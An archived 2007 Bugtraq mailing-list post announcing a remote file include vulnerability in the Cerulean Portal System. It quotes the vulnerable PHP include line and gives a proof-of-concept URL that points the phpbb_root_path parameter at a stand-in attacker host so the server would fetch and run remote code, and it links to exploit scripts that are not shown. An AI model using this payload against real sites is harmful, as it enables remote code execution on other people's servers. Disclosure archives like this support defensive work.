| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 1 Feb 2007 05:39:48 -0000 From: xorontr@...il.com To: bugtraq@...urityfocus.com Subject: Cerulean Portal System (phpbb_root_path) Remote File Include Exploit ----------------------------------------------- Cerulean Portal System (phpbb_root_path) Remote File Include Exploit ----------------------------------------------- Author: xoron xoron.biz - xoron.info ----------------------------------------------- Code: include ($phpbb_root_path . 'portal/config.' . $phpEx); ----------------------------------------------- POC: www.[target].com/[script_pat]/portal/portal.php?phpbb_root_path=http://evilscripts? ----------------------------------------------- Exploit: Exploit coded by xoron..! HTML www.xoron.info/bugs/ceruleanportalsystem-html.txt PERL www.xoron.info/bugs/ceruleanportalsystem-perl.txt ----------------------------------------------- download: http://sourceforge.net/projects/cerulean/ ----------------------------------------------- Tesekkurler: pang0, chaos, can bjorn Thanx: str0ke, kacper xoron gider izi kalir, selametle. kaybetmenin tiryakisi bir cocuk xoron. Adimizi altin harflerle yazdik. ----------------------------------------------- # milw0rm.com [2007-01-31]
Powered by blists - more mailing lists